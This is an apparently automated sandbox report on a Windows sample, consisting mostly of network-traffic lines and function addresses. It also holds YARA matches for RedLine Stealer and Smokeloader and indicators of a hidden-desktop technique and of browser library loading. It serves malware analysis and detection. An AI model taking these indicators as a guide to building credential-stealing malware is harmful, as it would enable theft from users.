Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:50098 version: TLS 1.2

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409E30

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1909336167.0000000002CA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF2ECD0	0_2_6CF2ECD0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D058D20	0_2_6D058D20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CECECC0	0_2_6CECECC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEDAC60	0_2_6CEDAC60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D05CDC0	0_2_6D05CDC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFAAC30	0_2_6CFAAC30
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF96C00	0_2_6CF96C00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED4DB0	0_2_6CED4DB0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF66D90	0_2_6CF66D90
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF9ED70	0_2_6CF9ED70
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFFAD50	0_2_6CFFAD50
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D010F20	0_2_6D010F20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEDAEC0	0_2_6CEDAEC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF70EC0	0_2_6CF70EC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF56E90	0_2_6CF56E90
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF6EE70	0_2_6CF6EE70
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D018FB0	0_2_6D018FB0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFB0E20	0_2_6CFB0E20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFAEFF0	0_2_6CFAEFF0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED0FE0	0_2_6CED0FE0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEDEFB0	0_2_6CEDEFB0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF92F70	0_2_6CF92F70
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF3EF40	0_2_6CF3EF40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED6F10	0_2_6CED6F10
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFD68E0	0_2_6CFD68E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA4840	0_2_6CFA4840
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF20820	0_2_6CF20820
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF5A820	0_2_6CF5A820
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF049F0	0_2_6CF049F0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFEC9E0	0_2_6CFEC9E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF909B0	0_2_6CF909B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF609A0	0_2_6CF609A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF8A9A0	0_2_6CF8A9A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF08960	0_2_6CF08960
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF26900	0_2_6CF26900
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF4EA80	0_2_6CF4EA80
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF4CA70	0_2_6CF4CA70
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF88A30	0_2_6CF88A30
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF7EA00	0_2_6CF7EA00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFD6BE0	0_2_6CFD6BE0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF70BA0	0_2_6CF70BA0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF164D0	0_2_6CF164D0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF6A4D0	0_2_6CF6A4D0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D018550	0_2_6D018550
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFFA480	0_2_6CFFA480
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEE8460	0_2_6CEE8460
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF5A430	0_2_6CF5A430
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF34420	0_2_6CF34420
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF5E5F0	0_2_6CF5E5F0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF9A5E0	0_2_6CF9A5E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEC45B0	0_2_6CEC45B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF70570	0_2_6CF70570
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF32560	0_2_6CF32560
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF28540	0_2_6CF28540
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFD4540	0_2_6CFD4540
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF2E6E0	0_2_6CF2E6E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF6E6E0	0_2_6CF6E6E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEF46D0	0_2_6CEF46D0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF2C650	0_2_6CF2C650
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEFA7D0	0_2_6CEFA7D0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF50700	0_2_6CF50700
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFAC0B0	0_2_6CFAC0B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEE00B0	0_2_6CEE00B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEC8090	0_2_6CEC8090
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF1E070	0_2_6CF1E070
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF98010	0_2_6CF98010
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF9C000	0_2_6CF9C000
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED01E0	0_2_6CED01E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF38140	0_2_6CF38140
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF46130	0_2_6CF46130
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFB4130	0_2_6CFB4130
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF9E2B0	0_2_6CF9E2B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA22A0	0_2_6CFA22A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D012370	0_2_6D012370
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF58260	0_2_6CF58260
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF68250	0_2_6CF68250
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA8220	0_2_6CFA8220
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF9A210	0_2_6CF9A210
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF243E0	0_2_6CF243E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF2E3B0	0_2_6CF2E3B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF023A0	0_2_6CF023A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF66370	0_2_6CF66370
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED2370	0_2_6CED2370
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFEC360	0_2_6CFEC360
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED8340	0_2_6CED8340
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D0562C0	0_2_6D0562C0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF42320	0_2_6CF42320
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF91CE0	0_2_6CF91CE0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF6FC80	0_2_6CF6FC80
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D019D90	0_2_6D019D90
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CED3C40	0_2_6CED3C40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFF9C40	0_2_6CFF9C40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEE1C30	0_2_6CEE1C30
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA1DC0	0_2_6CFA1DC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEC3D80	0_2_6CEC3D80
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D00DCD0	0_2_6D00DCD0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF33D00	0_2_6CF33D00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D027F20	0_2_6D027F20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEF3EC0	0_2_6CEF3EC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D053FC0	0_2_6D053FC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFDDE10	0_2_6CFDDE10
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF7BFF0	0_2_6CF7BFF0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFEDFC0	0_2_6CFEDFC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D055E60	0_2_6D055E60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6D02BE70	0_2_6D02BE70
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CEF1F90	0_2_6CEF1F90

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6D05DAE0 appears 56 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6CEF9B10 appears 73 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6CEF3620 appears 72 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6D0509D0 appears 253 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6D009F30 appears 31 times
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: String function: 6D05D930 appears 45 times

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 2432

Source: DbMBWMxoNv.exe, 00000000.00000002.1930092676.0000000070152000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs DbMBWMxoNv.exe
Source: DbMBWMxoNv.exe, 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs DbMBWMxoNv.exe

Source: DbMBWMxoNv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1909336167.0000000002CA2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

